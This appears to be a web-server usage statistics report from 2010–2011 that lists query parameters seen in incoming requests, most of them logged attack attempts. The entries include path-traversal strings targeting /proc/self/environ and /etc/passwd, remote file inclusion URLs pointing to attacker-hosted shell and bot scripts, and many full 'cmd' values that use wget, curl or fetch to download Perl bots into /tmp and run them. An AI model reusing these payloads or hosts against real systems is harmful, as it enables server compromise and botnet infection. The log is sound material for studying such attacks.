Parameter	CONFIG_EXT[LANGUAGES_DIR]http://abdclub.com/xcart/guide/work ing_with_orders.txt?
Value	Accesses
	1
OTHER:	1,709
Script	Total Accesses
/wusage/weekly/2011/01/09/	2,076
Parameters by Submitted Value
Parameter	Itemid
Value	Accesses
12	17
Parameter	Option
Value	Accesses
com_myfiles	5
com_google	5
Parameter	amp;view
Value	Accesses
..//..//..//..//..//..//..//..///proc/self/environ 00	4
Parameter	controller
Value	Accesses
..//..//..//..//..//..//..//..///proc/self/environ	239
..//..//..//..//..//..//..//..///proc/self/environ 00	197
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..// proc/self/environ	165
../../../../../../../../../../../../../../../proc/self/envir on	137
..//..//..//..//..//..//..//..//..//..//..///proc/self/envir on	78
../../../../../../../../../../../../../../..//proc/self/envi ron	45
../../../../../../../../../../../../../../../../../../../../ ../../../..//proc/self/environ 00	43
../../../../../../../../../../..//proc/self/environ 00	35
../../../../../../../../../../..//proc/self/environ 00	20
../../../../../../../../../../../../..//proc/self/environ 00	17
Parameter	option
Value	Accesses
com_google	848
com_fabrik	118
com_myblog	17
com_rwcards	11
com_product	11
com_goole	10
com_rwcards/?custompluginfile[]=../../../../../../../../../. ./../../../../../../../../../../../../../..//proc/self/envir on 00	3
com_rwcards/?custompluginfile[]=../../../../../../../../../. ./../../..//proc/self/environ 00	2
com_rwcards/?custompluginfile[]=..//..//..//..//..//..//..// ..//..//..//..//..//..//..//proc/self/environ 00	1
com_pcchess	1
Parameter	task
Value	Accesses
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..// proc/self/environ	9
../../../../../../../../../../../../../../../proc/self/envi ron	3
../../../../../../../../../../../../../../../proc/self/envir on	3
..//..//..//..//..//..//..//..///proc/self/environ 00	2
Parameter	view
Value	Accesses
..//..//..//..//..//..//..//..///proc/self/environ 00	6
rwcards	1
OTHER:	23
Script	Total Accesses
/wusage/weekly/2010/12/12/	2,051
Parameters by Submitted Value
Parameter	Itemid
Value	Accesses
12	36
11	2
27	1
Parameter	Option
Value	Accesses
com_google	4
Parameter	amp;view
Value	Accesses
..//..//..//..//..//..//..//..///proc/self/environ 00	4
Parameter	controller
Value	Accesses
..//..//..//..//..//..//..//..///proc/self/environ	299
..//..//..//..//..//..//..//..///proc/self/environ 00	176
../../../../../../../../../../../../../../../proc/self/envir on	132
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..// proc/self/environ	96
..//..//..//..//..//..//..//..//..//..//..///proc/self/envir on	71
../../../../../../../../../../../../../../../../../../../../ ../../../..//proc/self/environ 00	46
../../../../../../../../../../../../../../..//proc/self/envi ron	41
../../../../../../../../../../..//proc/self/environ 00	36
..//..//..//..//..//..//..//..//..//..//..///proc/self/z3n	20
//..//..//..//..//..//..//..//..///proc/self/environ 00	14
Parameter	option
Value	Accesses
com_google	836
com_fabrik	110
com_myblog	39
com_goole	6
com_product	6
com_rwcards	4
com_rwcards/?custompluginfile[]=../../../../../../../../../. ./../../../../../../../../../../../../../..//proc/self/envir on 00	1
Parameter	task
Value	Accesses
..//..//..//..//..//..//..//..///proc/self/environ 00	18
../../../../../../../../../../../../../../../proc/self/envi ron	11
../../../../../../../../../../../../../../../proc/self/envir on	7
../../../../../../../../../../../../../../..//proc/self/envi ron 00	1
../../../../../../../../../../../../../../../../../../../../ ../../../..//proc/self/environ 00	1
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..// proc/self/environ	1
Parameter	view
Value	Accesses
..//..//..//..//..//..//..//..///proc/self/environ 00	6
rwcards	1
OTHER:	25
Script	Total Accesses
/wusage///	2,048
Parameters by Submitted Value
Parameter	DIR_PREFIX
Value	Accesses
http://www.town-classifieds.com/adpics/baner.txt???	2
http://www.lazar.ru/manager/processors/copyright.txt? ??	1
Parameter	DOCUMENT_ROOT
Value	Accesses
http://dk.fileave.com/heheh.txt????	7
http://www.corretoresdeseguros.com.br/estatisticas/id1???	3
http://190.81.28.182/incaware/id1.txt??	2
Parameter	GLOBALS
Value	Accesses
	10
Parameter	INCLUDE_FOLDER
Value	Accesses
http://www.jjdd.co.kr/nalog/plug_in_config/pro//id1???	2
http://nic.bupt.edu.cn/media/j1.txt??	1
http://www.c21vox.tv/id1.txt??	1
http://surya1.fileave.com/id.txt??	1
Parameter	SERVER[DOCUMENT_ROOT]
Value	Accesses
http://www.kyokushin.hu/fx29id2.txt???	1
Parameter	_PHPLIB[libdir]
Value	Accesses
http://phamsight.com/docs/images/head??	36
http://www.howtolisten.kr/sarangbi_bgm/id1.txt?	7
http://www.howtolisten.kr/lct/lib/list/respon1.txt?	7
http://nic.bupt.edu.cn/media/j1.txt??	6
http://www.whinercentral.com/modules/Neos_Chronos/modules/ad min/mawar.txt??????	5
http://www.howtolisten.kr/lct/exam3/81/auto1.txt???	4
http://howtolisten.kr//sarangbi_bgm/id1.txt??	3
http://www.lovebyday.com/linux/Oid1.txt??	3
http://www.irishtoothache.com/id1.txt??????	3
http://musicadelibreria.net/footer??	3
Parameter	_REQUEST
Value	Accesses
	10
Parameter	_REQUEST[Itemid]
Value	Accesses
1	10
Parameter	_REQUEST[option]
Value	Accesses
com_content	10
Parameter	_SERVERDOCUMENT_ROOT
Value	Accesses
http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/fxid.txt?	1
OTHER:	1,909
Script	Total Accesses
/wusage/summary/cgi.html//transcripts.php	2,024
Parameters by Submitted Value
Parameter	action
Value	Accesses
view	159
http://ownsirc.googlepages.com/botnet.txt?	30
http://www.oslutadores.com/?id=23530	28
http://www.freewebs.com/yahwek/phpbot.txt?	28
http://www.jungo8949.co.kr/tool25.txt?	23
	20
http://www.neoncomanda.kit.net/tool25.dat?	18
http://www.pucorp.t5.com.br/lp.txt?	18
http://yahwek.dll.googlepages.com/phpbot.txt?	16
http://204.11.228.115/id.txt?	15
Parameter	cmd
Value	Accesses
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br /~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l ynx http://eep.br/~gpereira/but.txt;perl but.txt	12
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	11
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt ;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/ /azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet .txt	8
cd /tmp;rm -rf ownz;wget http://avastscript.kit.net/ownz.tx t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz .txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt	7
cd /tmp;rm botnet.txt;wget http://fuckoff.no-ip.org/botnet.t xt;fetch http://fuckoff.no-ip.org/botnet.txt;lwp-download ht tp://fuckoff.no-ip.org/botnet.txt;curl -O http://fuckoff.no- ip.org/botnet.txt;lynx http://fuckoff.no-ip.org/botnet.txt;p erl botnet.txt	6
cd /tmp;rm x.txt;wget http://www.killersofdragons.com/x.txt; fetch http://www.killersofdragons.com/x.txt;lwp-download htt p://www.killersofdragons.com/x.txt;curl -O http://www.killer sofdragons.com/x.txt;lynx http://www.killersofdragons.com/x. txt;perl x.txt	5
uname -a; id	5
cd /tmp;rm bot.txt;wget http://189.24.138.40/bot.txt;fetch h ttp://189.24.138.40/bot.txt;lwp-download http://189.24.138.4 0/bot.txt;curl -O http://189.24.138.40/bot.txt;lynx http://1 89.24.138.40/bot.txt;perl bot.txt;rm -rf *.txt	5
id	3
cd /tmp;rm bot.txt;wget http://www.3sk3nt.by.ru/bot.txt;fetc h http://www.3sk3nt.by.ru/bot.txt;lwp-download http://www.3s k3nt.by.ru/bot.txt;curl -O http://www.3sk3nt.by.ru/bot.txt;l ynx http://www.3sk3nt.by.ru/bot.txt;perl bot.txt	3
Parameter	deptid
Value	Accesses
1	155
http://204.11.228.115/id.txt?	4
Parameter	list
Value	Accesses
1	1
Parameter	search_string
Value	Accesses
http://www.fabiofotografo.com.br/js/var.txt??	26
http://www.jungo8949.co.kr/tool25.txt?	23
http://201.37.71.117:8090/tool25.txt?	5
http://www.chamala.kit.net/tool25.txt?	4
http://204.11.228.115/id.txt?	4
http://usuarios.arnet.com.ar/larry123/safe.txt?	4
http://proxysx.t35.com/x0.txt?	4
http://xsenharox.xpg.com.br/e_sempre_nois.txt?	4
http://pucorp.org/pbot.txt?	3
http://snock.host.sk/php.txt??	3
Parameter	userid
Value	Accesses
0	155
OTHER:	1,209
Script	Total Accesses
/wusage/monthly/2011/01/01/	2,017
Parameters by Submitted Value
Parameter	Itemid
Value	Accesses
12	42
Parameter	controller
Value	Accesses
..//..//..//..//..//..//..//..///proc/self/environ	255
..//..//..//..//..//..//..//..///proc/self/environ 00	216
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..// proc/self/environ	120
../../../../../../../../../../../../../../../proc/self/envir on	108
../../../../../../../../../../..//proc/self/environ 00	75
..//..//..//..//..//..//..//..//..//..//..///proc/self/envir on	73
../../../../../../../../../../../../../../..//proc/self/envi ron	27
../../../../../../../../../../../../../../..//proc/self/envi ron 00	16
../../../../../../../../../../../../../../../../../../../../ ../../../..//proc/self/environ 00	15
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..// ..//..//..//..//..//..//..//..//..///proc/self/environ 00	13
Parameter	option
Value	Accesses
com_google	772
com_rokdownloads	54
com_rwcards	43
com_myblog	42
com_fabrik	32
com_juser	13
com_gcalendar	12
com_product	6
com_jajobboard	2
com_rwcards/?custompluginfile[]=../../../../../../../../../. ./../../../../..//proc/self/environ 00	1
Parameter	task
Value	Accesses
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..// proc/self/environ	40
../../../../../../../../../../../../..//proc/self/environ 00	2
Parameter	view
Value	Accesses
rwcards	20
OTHER:	18
Script	Total Accesses
/wusage/summary/cgi.html//phplive/setup/header.php	2,016
Parameters by Submitted Value
Parameter	?v
Value	Accesses
	1
Parameter	cmd
Value	Accesses
cd /tmp;lwp-download http://h1.ripway.com/tsk4/botx2.txt;per l botx2.txt;rm -rf txt	17
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	13
cd /tmp;lwp-download http://h1.ripway.com/cmdtsk/botx2.txt;p erl botx2.txt;rm -rf txt	11
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br /~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l ynx http://eep.br/~gpereira/but.txt;perl but.txt	11
cd /tmp;wget http://206.71.148.32/anaozao.txt;curl -O -f htt p://206.71.148.32/anaozao.txt;lynx -source http://206.71.148 .32/anaozao.txt;lwp-rget http://206.71.148.32/anaozao.txt;fe tch http://206.71.148.32/anaozao.txt;perl anaozao.txt;rm -rf anaozao.txt	10
cd /tmp;lwp-download http://h1.ripway.com/arroba5/botx.txt;p erl botx.txt;rm -rf botx	10
cd /tmp;wget http://h1.ripway.com/tsk4/botx2.txt;perl botx2. txt;rm -rf txt	9
uname -a; id	8
cd /tmp;wget http://208.100.59.56/nanaozin.txt;curl -O -f ht tp://208.100.59.56/nanaozin.txt;lynx -source http://208.100. 59.56/nanaozin.txt;lwp-rget http://208.100.59.56/nanaozin.tx t;fetch http://208.100.59.56/nanaozin.txt;perl nanaozin.txt; rm -rf nanaozin.txt	7
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt ;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/ /azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet .txt	7
Parameter	css_path
Value	Accesses
http://www.jungo8949.co.kr/tool25.txt?	76
http://h1.ripway.com/tsk4/cmd.txt?	40
http://catholique-sartrouville-78.cef.fr/IMG/dna.txt	33
http://houdateamo.altervista.org/dna.txt	28
http://yahwek.dll.googlepages.com/phpbot.txt?	27
http://www.diabinhoinfernal.kit.net/iLeGaiS/tool25.txt?	26
http://www.jungo8949.co.kr./tool25.txt?	25
http://www.capsoir.com/images/TRA.txt?	22
http://www.cosmick.kit.net/ty.txt?	19
http://www.geneseobeadstudio.com/cmds.txt?	19
Parameter	list
Value	Accesses
1	1
OTHER:	1,596
Script	Total Accesses
/wusage/summary/cgi.html//phplive/message_box.php	1,954
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm -rf ownz;wget http://avastscript.kit.net/ownz.tx t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz .txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt	13
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br /~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l ynx http://eep.br/~gpereira/but.txt;perl but.txt	11
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	11
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt ;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/ /azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet .txt	7
cd /tmp;rm botnet.txt;wget http://fuckoff.no-ip.org/botnet.t xt;fetch http://fuckoff.no-ip.org/botnet.txt;lwp-download ht tp://fuckoff.no-ip.org/botnet.txt;curl -O http://fuckoff.no- ip.org/botnet.txt;lynx http://fuckoff.no-ip.org/botnet.txt;p erl botnet.txt	6
cd /tmp;rm x.txt;wget http://www.killersofdragons.com/x.txt; fetch http://www.killersofdragons.com/x.txt;lwp-download htt p://www.killersofdragons.com/x.txt;curl -O http://www.killer sofdragons.com/x.txt;lynx http://www.killersofdragons.com/x. txt;perl x.txt	5
cd /tmp;rm bot.txt;wget http://189.24.138.40/bot.txt;fetch h ttp://189.24.138.40/bot.txt;lwp-download http://189.24.138.4 0/bot.txt;curl -O http://189.24.138.40/bot.txt;lynx http://1 89.24.138.40/bot.txt;perl bot.txt;rm -rf *.txt	5
id	4
uname -a; id	4
cd /tmp;rm x.txt;wget http://189.6.162.125:8090/x.txt;fetch http://189.6.162.125:8090/x.txt;lwp-download http://189.6.16 2.125:8090/x.txt;curl -O http://189.6.162.125:8090/x.txt;lyn x http://189.6.162.125:8090/x.txt;perl x.txt	3
Parameter	deptid
Value	Accesses
http://www.jungo8949.co.kr/tool25.txt?	23
http://www.fabiofotografo.com.br/js/var.txt??	10
http://201.37.71.117:8090/tool25.txt?	5
http://proxysx.t35.com/x0.txt?	4
http://www.chamala.kit.net/tool25.txt?	4
http://xsenharox.xpg.com.br/e_sempre_nois.txt?	4
http://204.11.228.115/id.txt?	4
http://pucorp.org/pbot.txt?	3
http://freewebtown.com/trabalho/CMD.txt?	3
http://snock.host.sk/php.txt??	3
Parameter	l
Value	Accesses
ezpub	135
http://204.11.228.115/id.txt?	4
Parameter	list
Value	Accesses
1	1
Parameter	theme
Value	Accesses
	158
http://ownsirc.googlepages.com/botnet.txt?	30
http://www.oslutadores.com/?id=23530	28
http://www.freewebs.com/yahwek/phpbot.txt?	28
http://www.jungo8949.co.kr/tool25.txt?	21
http://www.neoncomanda.kit.net/tool25.dat?	19
http://www.pucorp.t5.com.br/lp.txt?	18
http://www.capsoir.com/images/TRA.txt?	16
http://lol123.fileave.com/script9.txt??	15
http://204.11.228.115/id.txt?	15
Parameter	x
Value	Accesses
1	131
http://204.11.228.115/id.txt?	4
OTHER:	1,199
Script	Total Accesses
/wusage/monthly/2010/10/01/	1,906
Parameters by Submitted Value
Parameter	Option
Value	Accesses
com_google	5
Parameter	amp;view
Value	Accesses
..//..//..//..//..//..//..//..///proc/self/environ 00	4
Parameter	controller
Value	Accesses
../../../../../../../../../../../../../../../proc/self/envir on	353
..//..//..//..//..//..//..//..///proc/self/environ	212
..//..//..//..//..//..//..//..///proc/self/environ 00	141
../../../../../../../../../../../../../../../../../../../../ ../../../..//proc/self/environ 00	67
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..// proc/self/environ	53
..//..//..//..//..//..//..//..//..//..//..///proc/self/envir on	38
..//..//..//..//..//..//..//..//..//..//..///proc/self/z3n	24
//..//..//..//..//..//..//..//..///proc/self/environ 00	22
../../../../../../../../../../../../../../..//proc/self/envi ron	19
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..// ..//..//..//..//..//..//..//..//..///proc/self/environ 00	10
Parameter	option
Value	Accesses
com_google	938
com_fabrik	10
Parameter	view
Value	Accesses
..//..//..//..//..//..//..//..///proc/self/environ 00	6
OTHER:	4
Script	Total Accesses
/wusage/summary/cgi.html/components/com_performs/performs.ph p	1,869
Parameters by Submitted Value
Parameter
Value	Accesses
http://boneunix.by.ru/good.txt?	1
Parameter	cmd
Value	Accesses
cd /tmp;rm ng;wget http://ownz-you.com/ng.txt;fetch http:// ownz-you.com/ng.txt;lwp-download http://ownz-you.com/ng.txt; curl -O http://ownz-you.com/ng.txt;lynx http://ownz-you.com/ ng.txt;perl ng.txt;rm -rf ng	8
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	5
cd /tmp;rm x.txt;wget http://baixinho.we.bs/x.txt;fetch http ://baixinho.we.bs/x.txt;lwp-download http://baixinho.we.bs/x .txt;curl -O http://baixinho.we.bs/x.txt;lynx http://baixinh o.we.bs/x.txt;perl x.txt	5
cd /tmp;rm root.txt;wget www.3sk3nt.kit.net/root.txt;fetch w ww.3sk3nt.kit.net/root.txt;lwp-download www.3sk3nt.kit.net/r oot.txt;curl -O www.3sk3nt.kit.net/root.txt;lynx www.3sk3nt. kit.net/root.txt;perl root.txt	4
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h ttp://www.anje.pt/ip1.txt;wget http://www.anje.pt/ros1.txt;w get http://www.anje.pt/scanasc.txt;curl -o ip1.txt http://ww w.anje.pt/ip1.txt;curl -o ros1.txt http://www.anje.pt/ros1.t xt;curl -o scanasc.txt http://www.anje.pt/scanasc.txt;perl i p1.txt;perl ros1.txt;perl scanasc.txt	3
cd /tmp;rm bot123ffiii.txt;wget www.xsenharox.xpg.com.br/bot 123ffiii.txt;fetch www.xsenharox.xpg.com.br/bot123ffiii.txt; lwp-download www.xsenharox.xpg.com.br/bot123ffiii.txt;curl - O www.xsenharox.xpg.com.br/bot123ffiii.txt;lynx www.xsenharo x.xpg.com.br/bot123ffiii.txt;perl bot123ffiii.txt	3
cd /tmp;rm ful.txt;wget http://71.41.190.203/ful.txt;fetch h ttp://71.41.190.203/ful.txt;lwp-download http://71.41.190.20 3/ful.txt;curl -O http://71.41.190.203/ful.txt;lynx http://7 1.41.190.203/ful.txt;perl ful.txt;rm -rf ful.txt*	3
wget http://www.hobbiz.com/UP/spriter1.txt;curl -o spriter1. txt http://www.hobbiz.com/UP/spriter1.txt;perl spriter1.txt	3
killall -9 perl;rm spriter1.txt;wget http://www.hobbiz.com/U P/spriter1.txt;curl -o spriter1.txt http://www.hobbiz.com/UP /spriter1.txt;perl spriter1.txt	3
uname -a; id	3
Parameter	list
Value	Accesses
1	3
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/ima ges/.asc/www?????????????????????????????	40
http://www.dunakom.hu/userimages/id.txt?	31
http://ownsirc.googlepages.com/botnet.txt?	26
http://xredrum.com/id.txt?	24
http://208.74.174.183/brizola.txt?	20
http://www.mta.cl/galeria2/galery.txt?	18
http://201.37.71.117:8090/cmd.txt??	17
ftp://84.32.137.157/incoming/upload/trem/oldbisok??	16
http://arabx1st.iifree.net/safe.txt??	15
http://carnet.sakura.ne.jp/cscart_dir/skins/echo3?	15
Parameter	nst
Value	Accesses
whoami	1
OTHER:	1,602
Script	Total Accesses
/////	1,844
Parameters by Submitted Value
Parameter	DOCUMENT_ROOT
Value	Accesses
http://www.samjinenginc.com/board/readme.txt???	3
http://www.knotnilla.com/images/id1.txt??	1
http://www.austria-skitest.com/snowkids/baner.txt??	1
http://www.logica-tech.com/foto/baner.txt??	1
Parameter	INCLUDE_FOLDER
Value	Accesses
http://bagoesss.fileave.com/id1.txt????	3
Parameter	Itemid
Value	Accesses
12	15
Parameter	Option
Value	Accesses
com_myblog	3
Parameter	_SERVER[DOCUMENT_ROOT]
Value	Accesses
http://hirlevel.uw.hu/Ckrid1.txt??	12
http://www.redseafish.ru/forum//xs_mod/tpl/ver1?	10
http://phamsight.com/docs/images/head???	9
http://musicadelibreria.net/footer??	9
http://nic.bupt.edu.cn/media/id1.txt???	9
http://aglifestylesmarketplace.com/AinuLid1.txt??	8
http://dongja.booktobi.com//bbs/id1.txt?	7
http://kf-house.huco-tnm.com/syssite/include/js/calendar/inc lude/dategif/ipays/id1.txt???	7
http://200.199.242.22/images/.ajim/ajim1.txt????	7
http://wenda.zoomshare.com/files/feelscanz.txt?????	7
Parameter	_zb_path
Value	Accesses
http://www.koreadefence.net/data/shirohige/zfxid.txt??	5
http://www.princedent.com/bbs/set_up/1.txt????	4
http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1????	4
http://www.abruzzobooking.it/mambots/idxx.txt??	4
http://www.abruzzobooking.it/mambots/idxx.txt? ?	2
http://creative-alchemy.com/zencart//media/id1.txt??	1
http://yeshouse.mk.co.kr/education/p1.txt???	1
http://bwbministries.com/images/r8_c11.gif???	1
http://i0.co.kr/i0mall//admin/tukulid.txt??	1
Parameter	controller
Value	Accesses
../../../../../../../../../../../../../../../proc/self/envir on	279
..//..//..//..//..//..//..//..///proc/self/environ 00	109
../../../../../../../../../../../../../../../../../../../../ ../../../..//proc/self/environ 00	89
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..// proc/self/environ	73
../../../../../../../../../../../../..//proc/self/environ 00	46
../../../../../../../../../../../../../../../../../../../../ ../../../../proc/self/environ 00	23
../../../../../../../../../../../../../../..//proc/self/envi ron 00	8
....//....//....//....//....//....//....//....//proc/self/en viron 00	4
./../../../../../../../../etc/passwd	1
../../../../../../../../../../proc/self/environ 00	1
Parameter	custompluginfile[]
Value	Accesses
http://www.yak.com.pl/id1.txt?	1
Parameter	id.gallery.php?path
Value	Accesses
http://www.hackclub.com.ar/javascript//id1.txt?	1
Parameter	language_id
Value	Accesses
http://www.seoul10.org/zerobd/gg_late/copyme.txt??	1
OTHER:	1,073
Script	Total Accesses
/wusage/summary/cgi.html//message_box.php	1,810
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm -rf ownz;wget http://avastscript.kit.net/ownz.tx t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz .txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt	13
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br /~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l ynx http://eep.br/~gpereira/but.txt;perl but.txt	12
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	11
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt ;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/ /azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet .txt	7
cd /tmp;rm botnet.txt;wget http://fuckoff.no-ip.org/botnet.t xt;fetch http://fuckoff.no-ip.org/botnet.txt;lwp-download ht tp://fuckoff.no-ip.org/botnet.txt;curl -O http://fuckoff.no- ip.org/botnet.txt;lynx http://fuckoff.no-ip.org/botnet.txt;p erl botnet.txt	6
cd /tmp;rm bot.txt;wget http://189.24.138.40/bot.txt;fetch h ttp://189.24.138.40/bot.txt;lwp-download http://189.24.138.4 0/bot.txt;curl -O http://189.24.138.40/bot.txt;lynx http://1 89.24.138.40/bot.txt;perl bot.txt;rm -rf *.txt	5
uname -a; id	4
cd /tmp;rm x.txt;wget http://www.killersofdragons.com/x.txt; fetch http://www.killersofdragons.com/x.txt;lwp-download htt p://www.killersofdragons.com/x.txt;curl -O http://www.killer sofdragons.com/x.txt;lynx http://www.killersofdragons.com/x. txt;perl x.txt	4
cd /tmp;rm x.txt;wget http://189.6.162.125:8090/x.txt;fetch http://189.6.162.125:8090/x.txt;lwp-download http://189.6.16 2.125:8090/x.txt;curl -O http://189.6.162.125:8090/x.txt;lyn x http://189.6.162.125:8090/x.txt;perl x.txt	3
cd /tmp;rm bot.txt;wget http://www.3sk3nt.by.ru/bot.txt;fetc h http://www.3sk3nt.by.ru/bot.txt;lwp-download http://www.3s k3nt.by.ru/bot.txt;curl -O http://www.3sk3nt.by.ru/bot.txt;l ynx http://www.3sk3nt.by.ru/bot.txt;perl bot.txt	3
Parameter	l
Value	Accesses
admin	130
http://204.11.228.115/id.txt?	4
Parameter	list
Value	Accesses
1	1
Parameter	theme
Value	Accesses
	153
http://ownsirc.googlepages.com/botnet.txt?	31
http://www.oslutadores.com/?id=23530	28
http://www.freewebs.com/yahwek/phpbot.txt?	28
http://www.jungo8949.co.kr/tool25.txt?	22
http://www.neoncomanda.kit.net/tool25.dat?	19
http://www.pucorp.t5.com.br/lp.txt?	18
http://www.capsoir.com/images/TRA.txt?	16
http://lol123.fileave.com/script9.txt??	15
http://yahwek.dll.googlepages.com/phpbot.txt?	15
Parameter	x
Value	Accesses
http://www.jungo8949.co.kr/tool25.txt?	22
http://www.fabiofotografo.com.br/js/var.txt??	10
http://201.37.71.117:8090/tool25.txt?	5
http://xsenharox.xpg.com.br/e_sempre_nois.txt?	4
http://proxysx.t35.com/x0.txt?	4
http://www.chamala.kit.net/tool25.txt?	4
http://204.11.228.115/id.txt?	4
http://freewebtown.com/trabalho/CMD.txt?	3
http://www.hotelalpino.com.br/ferias/vnc/cmd/cmd.txt?	3
http://snock.host.sk/php.txt??	3
OTHER:	1,200
Script	Total Accesses
/wusage/summary/cgi.html//modules/AllMyGuests/signin.php	1,809
Parameters by Submitted Value
Parameter	_AMGconfig[cfg_serverpath]
Value	Accesses
http://64.22.125.219/r0x/id.txt???	64
http://www.jolieloves.com/mori/cmd.txt?	53
http://189.23.251.131/~tiago/new.txt?	52
http://211.236.244.133/~axlonaxlon/cmd.txt?	26
http://files.myopera.com/Towu614520/files/own.txt?	22
http://www.freewebs.com/yahwek/sete.txt?	20
http://sigbr.servegame.com:8080/mydick.txt?	19
	19
http://www.vsm.gov.tr/pwnd/http.txt??	18
http://own.741.com/mydick.txt?	18
Parameter	_AMGconfig[cfic.php?p
Value	Accesses
http://www.freewebs.com/t420/p.txt??	5
http://www.freewebs.com/h1h1h1/p.txt??	5
http://www.rj2009.kit.net/ddd.txt?	4
http://www.rj2008.kit.net/p.txt??	3
http://www.freewebs.com/playssonn/p.txt??	3
http://www.rj2009.kit.net/p.txt?	2
http://www.chapolin-ownz.us/inbox.txt?	1
http://www.rj2009.kit.net/ddd.txt??	1
http://www.rj2008.kit.net/perl.txt?	1
http://www.rj2009.kit.net/p.txt??	1
Parameter	cmd
Value	Accesses
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	15
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	10
id	6
uname -a; id	5
cd /tmp;rm botnet.txt;wget http://euseiquefiz.no-ip.info/bot net.txt;fetch http://euseiquefiz.no-ip.info/botnet.txt;lwp-d ownload http://euseiquefiz.no-ip.info/botnet.txt;curl -O htt p://euseiquefiz.no-ip.info/botnet.txt;lynx http://euseiquefi z.no-ip.info/botnet.txt;perl botnet.txt	3
